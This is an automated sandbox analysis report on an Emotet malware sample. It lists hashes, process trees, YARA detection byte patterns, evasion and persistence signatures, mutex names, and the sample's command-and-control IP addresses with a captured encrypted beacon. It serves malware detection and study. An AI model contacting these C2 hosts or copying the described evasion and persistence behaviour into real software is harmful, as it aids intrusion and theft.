Loading ...

Play interactive tourEdit tour

Analysis Report 9fdUNaHzLv

Overview

General Information

Sample Name:9fdUNaHzLv (renamed file extension from none to exe)
Analysis ID:380921
MD5:ecbc4b40dcfec4ed1b2647b217da0441
SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • 9fdUNaHzLv.exe (PID: 5816 cmdline: 'C:\Users\user\Desktop\9fdUNaHzLv.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • 9fdUNaHzLv.exe (PID: 3440 cmdline: C:\Users\user\Desktop\9fdUNaHzLv.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • providernvidia.exe (PID: 2212 cmdline: C:\Windows\SysWOW64\providernvidia.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
    • providernvidia.exe (PID: 5820 cmdline: C:\Windows\SysWOW64\providernvidia.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)
  • svchost.exe (PID: 4120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6248 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6284 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6348 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6388 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6468 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6556 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6576 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6692 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
9fdUNaHzLv.exeJoeSecurity_EmotetYara detected EmotetJoe Security
    9fdUNaHzLv.exeEmotetEmotet Payloadkevoreilly
    • 0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18
    • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.9fdUNaHzLv.exe.d10000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                0.0.9fdUNaHzLv.exe.d10000.0.unpackEmotetEmotet Payloadkevoreilly
                • 0x16f0:$snippet1: FF 15 F8 C1 D1 00 83 C4 0C 68 40 00 00 F0 6A 18
                • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 D1 00 85 C0
                5.0.providernvidia.exe.d10000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  5.0.providernvidia.exe.d10000.0.unpackEmotetEmotet Payloadkevoreilly
                  • 0x16f0:$snippet1: FF 15 F8 C1 D1 00 83 C4 0C 68 40 00 00 F0 6A 18
                  • 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 D1 00 85 C0
                  6.2.providernvidia.exe.d10000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Click to see the 11 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: 9fdUNaHzLv.exeAvira: detected
                    Multi AV Scanner detection for domain / URLShow sources
                    Source: http://173.230.145.224:8080/Virustotal: Detection: 6%Perma Link
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: 9fdUNaHzLv.exeVirustotal: Detection: 84%Perma Link
                    Source: 9fdUNaHzLv.exeReversingLabs: Detection: 96%
                    Machine Learning detection for sampleShow sources
                    Source: 9fdUNaHzLv.exeJoe Sandbox ML: detected
                    Source: 9fdUNaHzLv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9fdUNaHzLv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: global trafficTCP traffic: 192.168.2.3:49726 -> 193.169.54.12:8080
                    Source: global trafficTCP traffic: 192.168.2.3:49738 -> 173.230.145.224:8080
                    Source: Joe Sandbox ViewIP Address: 193.169.54.12 193.169.54.12
                    Source: Joe Sandbox ViewIP Address: 193.169.54.12 193.169.54.12
                    Source: Joe Sandbox ViewIP Address: 173.230.145.224 173.230.145.224
                    Source: Joe Sandbox ViewIP Address: 173.230.145.224 173.230.145.224
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 46 d3 2b 54 ae fc d6 3a 76 c4 9e 73 48 fe 49 d5 f8 b4 aa 2d 29 2b 5f 2f 51 43 49 d6 af b1 ee d1 66 a4 76 ca 80 7e 7d ea e5 1f b8 54 d1 f6 a8 c4 fa a1 57 39 fb 61 52 4d 96 65 1c a6 e5 99 49 14 ec 0a 71 5f e2 5f 33 d0 20 69 8c 9f 5a 32 77 74 73 7c c9 2f 93 bb 77 57 92 b1 7c 99 c3 87 db a5 21 ba d8 2c 2a d2 42 78 56 49 b5 f0 29 02 0c 0b 03 48 d2 8c 0b c9 96 0c 72 db 03 60 c2 fd 84 b6 1e f7 81 47 a2 a2 9f d7 df 4b 9b f8 81 27 f6 3c b6 1e 86 50 82 d3 0f c4 89 b9 d3 fa 11 b7 88 64 d4 13 72 ae 99 42 2a 33 00 d6 11 d6 e3 8f e5 c0 42 f8 4a 5e 4a 03 84 cb 86 dd ca 23 08 65 6d c2 80 b0 5c 78 7a d1 b5 7c 3b a0 03 2f 7e 46 84 fe 20 39 80 e0 81 78 aa bd 76 5f e9 ba 44 da d9 74 a3 d7 62 aa d7 3f 80 3d 8c b4 7a 00 be a8 d2 d3 f9 fb ab 00 f1 69 ea de 4c 42 14 d6 2b ca 76 bc b0 81 d7 e3 64 e6 af 00 43 c2 fa b0 a0 b9 da 47 86 d2 c5 cd 8c 15 59 05 75 39 6e e0 88 2c 4c f3 98 f9 d4 2c cb 9b 5f e7 88 4c 6d 67 98 57 b5 24 85 66 8e 2b 85 05 b1 48 6d e2 d8 2c 6b 5b df 78 26 b4 bf 71 e3 0f db 5f 38 ac 75 b5 12 43 ee 84 ec fb c3 ad 2e ba 07 ba 93 15 f2 d5 a8 d1 7c e9 a8 80 75 3f 62 31 6b 10 eb 5e 0e 5c b6 7e 5f 93 85 d6 88 ce 51 db 56 aa d8 17 1c e6 e8 4d 44 7a ed b0 f6 cf 34 da df 30 cb 84 62 00 1e dc 3c 10 8b a2 b9 0b ca 86 99 83 56 f0 9e af b0 6b 27 04 50 79 50 41 39 0b 87 d2 d8 cb 92 28 81 56 30 24 78 94 30 48 Data Ascii: F+T:vsHI-)+_/QCIfv~}TW9aRMeIq__3 iZ2wts|/wW|!,*BxVI)Hr`GK'<PdrB*3BJ^J#em\xz|;/~F 9xv_Dtb?=ziLB+vdCGYu9n,L,_LmgW$f+Hm,k[x&q_8uC.|u?b1k^\~_QVMDz40b<Vk'PyPA9(V0$x0H
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 79.172.249.82
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.169.54.12
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.230.145.224
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 436Connection: Keep-AliveCache-Control: no-cacheData Raw: 46 d3 2b 54 ae fc d6 3a 76 c4 9e 73 48 fe 49 d5 f8 b4 aa 2d 29 2b 5f 2f 51 43 49 d6 af b1 ee d1 66 a4 76 ca 80 7e 7d ea e5 1f b8 54 d1 f6 a8 c4 fa a1 57 39 fb 61 52 4d 96 65 1c a6 e5 99 49 14 ec 0a 71 5f e2 5f 33 d0 20 69 8c 9f 5a 32 77 74 73 7c c9 2f 93 bb 77 57 92 b1 7c 99 c3 87 db a5 21 ba d8 2c 2a d2 42 78 56 49 b5 f0 29 02 0c 0b 03 48 d2 8c 0b c9 96 0c 72 db 03 60 c2 fd 84 b6 1e f7 81 47 a2 a2 9f d7 df 4b 9b f8 81 27 f6 3c b6 1e 86 50 82 d3 0f c4 89 b9 d3 fa 11 b7 88 64 d4 13 72 ae 99 42 2a 33 00 d6 11 d6 e3 8f e5 c0 42 f8 4a 5e 4a 03 84 cb 86 dd ca 23 08 65 6d c2 80 b0 5c 78 7a d1 b5 7c 3b a0 03 2f 7e 46 84 fe 20 39 80 e0 81 78 aa bd 76 5f e9 ba 44 da d9 74 a3 d7 62 aa d7 3f 80 3d 8c b4 7a 00 be a8 d2 d3 f9 fb ab 00 f1 69 ea de 4c 42 14 d6 2b ca 76 bc b0 81 d7 e3 64 e6 af 00 43 c2 fa b0 a0 b9 da 47 86 d2 c5 cd 8c 15 59 05 75 39 6e e0 88 2c 4c f3 98 f9 d4 2c cb 9b 5f e7 88 4c 6d 67 98 57 b5 24 85 66 8e 2b 85 05 b1 48 6d e2 d8 2c 6b 5b df 78 26 b4 bf 71 e3 0f db 5f 38 ac 75 b5 12 43 ee 84 ec fb c3 ad 2e ba 07 ba 93 15 f2 d5 a8 d1 7c e9 a8 80 75 3f 62 31 6b 10 eb 5e 0e 5c b6 7e 5f 93 85 d6 88 ce 51 db 56 aa d8 17 1c e6 e8 4d 44 7a ed b0 f6 cf 34 da df 30 cb 84 62 00 1e dc 3c 10 8b a2 b9 0b ca 86 99 83 56 f0 9e af b0 6b 27 04 50 79 50 41 39 0b 87 d2 d8 cb 92 28 81 56 30 24 78 94 30 48 Data Ascii: F+T:vsHI-)+_/QCIfv~}TW9aRMeIq__3 iZ2wts|/wW|!,*BxVI)Hr`GK'<PdrB*3BJ^J#em\xz|;/~F 9xv_Dtb?=ziLB+vdCGYu9n,L,_LmgW$f+Hm,k[x&q_8uC.|u?b1k^\~_QVMDz40b<Vk'PyPA9(V0$x0H
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://173.230.145.224:8080/
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://173.230.145.224:8080/_
                    Source: providernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpString found in binary or memory: http://193.169.54.12:8080/
                    Source: providernvidia.exe, 00000006.00000002.463769550.00000000007A7000.00000004.00000020.sdmpString found in binary or memory: http://193.169.54.12:8080/3
                    Source: providernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpString found in binary or memory: http://193.169.54.12:8080/Z
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/
                    Source: providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpString found in binary or memory: http://79.172.249.82:443/1
                    Source: svchost.exe, 0000000A.00000002.465953510.000002A4BBE0C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 0000000A.00000002.465953510.000002A4BBE0C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 0000000A.00000002.465953510.000002A4BBE0C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 0000000A.00000002.465483390.000002A4BBD00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: svchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308724185.000001E921662000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000011.00000002.309091104.000001E921639000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: 9fdUNaHzLv.exe, 00000000.00000002.196957623.000000000145A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 9fdUNaHzLv.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.194691427.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.195820099.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 9fdUNaHzLv.exe, type: SAMPLEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet Payload Author: kevoreilly
                    Source: C:\Windows\SysWOW64\providernvidia.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile deleted: C:\Windows\SysWOW64\providernvidia.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D177F0
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D16E70
                    Source: 9fdUNaHzLv.exe, 00000002.00000002.204591346.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 9fdUNaHzLv.exe
                    Source: 9fdUNaHzLv.exe, 00000002.00000002.204591346.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 9fdUNaHzLv.exe
                    Source: 9fdUNaHzLv.exe, 00000002.00000002.207049764.0000000002C70000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 9fdUNaHzLv.exe
                    Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                    Source: 9fdUNaHzLv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9fdUNaHzLv.exe, type: SAMPLEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@20/8@0/5
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D12110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeMutant created: \Sessions\1\BaseNamedObjects\M3E49A257
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5152:120:WilError_01
                    Source: C:\Windows\SysWOW64\providernvidia.exeMutant created: \BaseNamedObjects\Global\I6F6A638B
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M6F6A638B
                    Source: C:\Windows\SysWOW64\providernvidia.exeMutant created: \BaseNamedObjects\M7EB4FDDE
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I6F6A638B
